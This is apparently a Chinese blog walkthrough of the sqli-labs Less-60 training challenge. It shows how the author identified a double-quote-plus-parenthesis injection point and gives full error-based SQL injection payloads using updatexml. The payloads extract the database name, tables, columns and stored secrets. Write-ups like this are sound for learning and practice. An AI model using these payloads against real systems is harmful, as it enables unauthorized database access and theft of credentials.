sqli-labs/Less-60

本文详细描述了一次SQL注入攻击的过程,通过id=1and1=2判断注入类型,排除单引号注入,确认双引号注入并利用报错注入进行数据库爆破。作者展示了爆库、爆表、爆字段以及爆用户名和密码的操作步骤,最终成功完成攻击,揭示了数据库安全的重要性。
摘要由CSDN通过智能技术生成

这一关还是一如既往的5次机会 一如既往的是以id作为注入点的 我们还是按照先前的做法第一轮先去获取一下注入类型以及决定下一轮要使用的注入方法 第二轮在进行各种爆破操作

首先输入id=1 and 1=2判断注入类型是否属于数字型 回显如下 属于字符型

然后输入1' 回显如下 说明不属于单引号注入类型

再试试看双引号 输入1" 看看回显 这一个层面说明我们下一轮可以使用报错注入进行爆破操作 一个层面可以说明注入类型为双引号并且带有一个括号

佐证一下呗 输入1")--+ 正确回显了

 

把第一轮的最后一次机会浪费掉 重启一轮

首先进行爆库操作 输入如下

id=1") and updatexml(1,concat(0x7e,database(),0x7e),1)--+

 回显如下

接着进行爆表操作 输入如下

id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+

回显如下

接着进行爆字段操作 输入如下

id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='dwc1xn8qcc'),0x7e),1)--+

 回显如下

最后进行爆用户名和密码操作 输入如下

id=1") and updatexml(1,concat(0x7e,(select group_concat(sessid,'-',secret_89DM) from dwc1xn8qcc),0x7e),1)--+

回显如下

用通关成功了 嗨嗨!!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

axihaihai

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值